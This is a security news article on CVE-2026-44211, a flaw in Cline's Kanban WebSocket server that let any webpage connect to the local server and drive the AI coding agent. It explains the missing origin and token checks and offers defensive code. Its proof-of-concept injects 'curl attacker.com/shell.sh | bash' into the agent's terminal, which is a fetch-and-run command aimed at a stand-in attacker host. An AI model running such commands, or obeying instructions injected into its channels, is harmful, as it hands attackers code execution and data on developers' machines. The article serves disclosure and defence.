PROBABLYPWNED
Vulnerabilities | May 12, 2026 | 4 min read

Cline AI Agent Flaw Let Any Website Execute Code on Developer Machines

CVE-2026-44211 (CVSS 9.7) allowed malicious websites to hijack Cline's Kanban WebSocket server, exfiltrate workspace data, and execute arbitrary commands through the AI agent. Patched in v0.1.66.

Marcus Chen

A critical vulnerability in Cline's Kanban server allowed any website to hijack the AI coding agent's terminal, execute arbitrary commands, and exfiltrate sensitive workspace data. The flaw—CVE-2026-44211—received a CVSS score of 9.7 and required no phishing, malware installation, or social engineering. A developer simply had to visit a malicious webpage while the Kanban server was running.

Oasis Security disclosed the vulnerability responsibly, and Cline patched the issue in version 0.1.66. But the attack surface it exposed—localhost services accessible to browser-based attacks—affects far more than just Cline.

TL;DR

  • What happened: Cline's Kanban WebSocket server accepted connections from any origin without authentication
  • Who's affected: Developers running Cline versions prior to 0.1.66
  • Severity: Critical (CVSS 9.7) - enables RCE via the AI agent
  • Action required: Update to Cline v0.1.66 or later immediately

What is Cline?

Cline is an AI-powered coding agent that runs as a VS Code extension. It integrates with Claude, GPT-4, and other language models to help developers write, debug, and refactor code. The Kanban feature provides a task management interface that coordinates work across the AI agent's various capabilities.

The extension has rapidly grown popular among developers seeking AI-assisted coding workflows. Its integration depth (reading files, executing commands, managing git operations) makes it powerful but also creates a significant attack surface if compromised.

How the Attack Worked

According to Oasis Security's analysis, the kanban npm package bundled with Cline starts a WebSocket server on 127.0.0.1:3484. The server had three critical flaws:

  1. No origin validation - Any website could connect, not just Cline's UI
  2. No authentication tokens - Connections weren't verified as legitimate
  3. No client verification - No mechanism to confirm the Kanban UI was the actual client

WebSocket connections are exempt from the same-origin policy restrictions that block most browser-based attacks. Any webpage a developer visits can silently establish WebSocket connections to localhost services.
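The three missing checks can be enforced at the HTTP Upgrade step, before a WebSocket session exists. The following is an added example, not Cline's actual patch: the allowed UI origin, the `token` query parameter and all function names are assumptions made for illustration.

```javascript
const crypto = require('node:crypto');

// Assumption: the legitimate Kanban UI is served from this origin.
const ALLOWED_ORIGINS = new Set(['http://127.0.0.1:3484']);

// Per-launch secret, handed to the real UI out of band by the process that starts the server.
function newSessionToken() {
  return crypto.randomBytes(32).toString('hex');
}

// Constant-time comparison; hashing first makes both buffers the same length.
function tokenMatches(presented, expected) {
  const a = crypto.createHash('sha256').update(String(presented)).digest();
  const b = crypto.createHash('sha256').update(String(expected)).digest();
  return crypto.timingSafeEqual(a, b);
}

// Decide whether an Upgrade request may become a WebSocket session.
// `req` mirrors Node's IncomingMessage: lower-cased `headers` plus `url`.
function authorizeUpgrade(req, expectedToken) {
  // Browsers attach Origin to every WebSocket handshake and page script cannot override it.
  const origin = req.headers.origin;
  if (origin !== undefined && !ALLOWED_ORIGINS.has(origin)) {
    return { ok: false, status: 403, reason: 'origin not allowed' };
  }
  // The token also covers non-browser local clients, which may send any Origin or none.
  let token = null;
  try {
    token = new URL(req.url, 'http://127.0.0.1').searchParams.get('token');
  } catch { /* malformed request target: treated as no token */ }
  if (!token || !tokenMatches(token, expectedToken)) {
    return { ok: false, status: 401, reason: 'missing or bad token' };
  }
  return { ok: true, status: 101, reason: 'accepted' };
}

// Wire the gate into a Node http.Server ahead of the WebSocket implementation.
function attachGate(server, expectedToken, onAccept) {
  server.on('upgrade', (req, socket, head) => {
    const verdict = authorizeUpgrade(req, expectedToken);
    if (!verdict.ok) {
      socket.end(`HTTP/1.1 ${verdict.status} Rejected\r\nConnection: close\r\n\r\n`);
      return;
    }
    onAccept(req, socket, head); // hand off only after both checks pass
  });
}
```

The browser WebSocket API cannot set custom request headers, which is why the token travels in the URL here; tokens in URLs can end up in logs, so keep them per-launch and short-lived.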

Attack Capabilities

Once connected, an attacker could:

Exfiltrate sensitive data in real-time:

  • Workspace filesystem paths
  • Task titles and descriptions
  • Git branch information
  • AI agent chat messages and context

Execute arbitrary code: The attacker injects a malicious prompt into the agent's terminal channel, then simulates a keypress. The AI agent accepts this as a legitimate instruction and executes whatever shell command the attacker specified.

Disrupt development: Control channels allow terminating active agent tasks, effectively DoS-ing the development workflow.

Proof of Concept

The attack required only a few lines of JavaScript on any webpage:

// Attacker's webpage
const ws = new WebSocket('ws://127.0.0.1:3484');

ws.onopen = () => {
  // Inject malicious command via agent terminal
  ws.send(JSON.stringify({
    type: 'terminal_input',
    data: 'curl attacker.com/shell.sh | bash'
  }));
};

The developer sees nothing suspicious. They're browsing a seemingly innocent website—perhaps a documentation page, a Stack Overflow answer, or a tech blog. Behind the scenes, the page connects to their local Kanban server and issues commands through their AI agent.

Why This Matters

This vulnerability highlights a growing attack surface: AI coding assistants with deep system access. As developers increasingly rely on tools like Cline, Cursor, Copilot, and others, the blast radius of a single flaw expands dramatically.

Traditional code vulnerabilities might expose one application. A compromised AI agent can access everything the developer can—source code, credentials, deployment pipelines, production infrastructure.

The browser-to-localhost attack vector is also underappreciated. Many developer tools run local services: debuggers, preview servers, API proxies, container management. Few implement proper origin validation. We've seen similar patterns in other vulnerability disclosures this year.

Remediation

  1. Update immediately to Cline version 0.1.66 or later

  2. Audit other localhost services across your development tools for similar origin validation gaps

  3. Implement host-based firewall rules restricting network port bindings where possible

  4. Review endpoint security policies for process-level controls on network listeners
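For step 2, one way to audit your own machine is to send each local listener a WebSocket handshake carrying an Origin it has no reason to trust and record whether it still upgrades. This is an added example, not tooling from Oasis Security or Cline; the probe origin and function names are constructed for illustration.

```javascript
const net = require('node:net');
const crypto = require('node:crypto');

// Constructed origin under the reserved .invalid TLD; no legitimate UI uses it.
const FOREIGN_ORIGIN = 'https://origin-audit.invalid';

// Build a minimal RFC 6455 client handshake for a service on 127.0.0.1.
function buildHandshake(port, origin) {
  const key = crypto.randomBytes(16).toString('base64');
  return [
    'GET / HTTP/1.1',
    `Host: 127.0.0.1:${port}`,
    'Upgrade: websocket',
    'Connection: Upgrade',
    `Sec-WebSocket-Key: ${key}`,
    'Sec-WebSocket-Version: 13',
    `Origin: ${origin}`,
    '', '',
  ].join('\r\n');
}

// Classify the status line a service sends back.
function classifyResponse(raw) {
  const m = /^HTTP\/1\.[01] (\d{3})/.exec(raw);
  if (!m) return 'not-http';
  // 101 means the handshake ignored Origin; the service may still authenticate
  // at message level, so treat this as "needs review", not proof of a flaw.
  if (m[1] === '101') return 'accepts-foreign-origin';
  return 'rejected-' + m[1];
}

// Probe one local port; always resolves, never rejects.
function probe(port, timeoutMs = 1500) {
  return new Promise((resolve) => {
    let buf = '';
    const sock = net.connect({ host: '127.0.0.1', port });
    const done = (result) => { sock.destroy(); resolve({ port, result }); };
    sock.setTimeout(timeoutMs, () => done(buf ? classifyResponse(buf) : 'no-response'));
    sock.on('connect', () => sock.write(buildHandshake(port, FOREIGN_ORIGIN)));
    sock.on('data', (d) => {
      buf += d.toString('latin1');
      if (buf.includes('\r\n')) done(classifyResponse(buf));
    });
    sock.on('error', () => done('closed'));
  });
}

// Audit a list of ports taken from your own listener inventory.
function auditPorts(ports) {
  return Promise.all(ports.map((p) => probe(p)));
}
```

Call `auditPorts([...])` with the ports your development tools listen on and follow up on every `accepts-foreign-origin` result.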

Affected Versions

Status       Versions
Vulnerable   Prior to 0.1.66
Patched      0.1.66 and later

Frequently Asked Questions

Was this vulnerability exploited in the wild? Oasis Security has not reported evidence of active exploitation. The vulnerability was discovered during a security assessment and responsibly disclosed before public proof-of-concept code became available.

Does this affect other AI coding tools? CVE-2026-44211 is specific to Cline's Kanban server implementation. However, the underlying pattern—localhost services without origin validation—may exist in other tools. The research should prompt security reviews across the AI development tool ecosystem.

I don't use the Kanban feature. Am I still affected? If the kanban package is installed as part of Cline, the vulnerable server may start regardless of whether you actively use the Kanban UI. Update to the patched version to eliminate the risk.
